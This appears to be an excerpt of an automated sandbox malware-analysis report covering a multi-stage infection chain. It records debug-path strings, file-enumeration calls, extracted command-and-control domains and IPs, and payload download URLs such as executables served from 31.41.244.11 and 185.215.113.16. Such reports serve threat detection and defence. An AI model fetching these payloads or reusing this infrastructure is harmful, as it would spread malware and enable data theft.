                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: FuturreApp.exe, 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, FuturreApp.exe, 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000063.00000002.2839636582.00007FF62B1A0000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013531293.00007FF8BFAD1000.00000040.00000001.01000000.00000014.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdbhP source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7289151898.000000006BF21000.00000020.00000001.01000000.00000026.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: D1UL0FG.exe, 00000005.00000003.2466075988.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3014816312.00007FF8BFBA1000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3014453254.00007FF8BFB61000.00000040.00000001.01000000.0000000D.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013206314.00007FF8BFAB1000.00000040.00000001.01000000.00000019.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3012961847.00007FF8BA24D000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: FuturreApp.exe, 00000055.00000002.7289981712.000000006BFE5000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3011122158.00007FF8B9131000.00000040.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3012153000.00007FF8B93C1000.00000040.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdb source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe Directory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe Directory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 5_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 5_2_00007FF67AED92F0 FindFirstFileExW,FindClose,5_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 5_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 6_2_00007FF67AED92F0 FindFirstFileExW,FindClose,6_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 6_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Code function: 6_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF67AEF18E4

                                Networking

                                Source: Malware configuration extractorURLs: awake-weaves.cyou
                                Source: Malware configuration extractorURLs: immureprech.biz
                                Source: Malware configuration extractorURLs: bellflamre.click
                                Source: Malware configuration extractorURLs: debonairnukk.xyz
                                Source: Malware configuration extractorURLs: diffuculttan.xyz
                                Source: Malware configuration extractorURLs: deafeninggeh.biz
                                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                                Source: Malware configuration extractorURLs: effecterectz.xyz
                                Source: Malware configuration extractorIPs: 185.215.113.43
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026E0C0 recv,recv,recv,recv,0_2_0026E0C0
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=a44515e6f9fc86eb9935a7da; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 19 Dec 2024 21:11:10 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: et https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/testpage.htm
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://127.0.0.1
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe/
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                                Source: skotes.exe, 00000003.00000003.5971400666.000000000139C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
                                Source: skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8001
                                Source: skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedU
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedd
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedy
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxeP
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxel
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/UZAj8wc.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/UZAj8wc.exeXYZ0123456789
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/6069966613/8ZVMneG.exeIv9
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exeXYZ0123456789
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exeshqos.dll
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/karl/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/loadman/random.exe:
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/loadman/random.exew
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/lolz/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exen
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe1
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exeC:
                                Source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exeLMEMXx
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
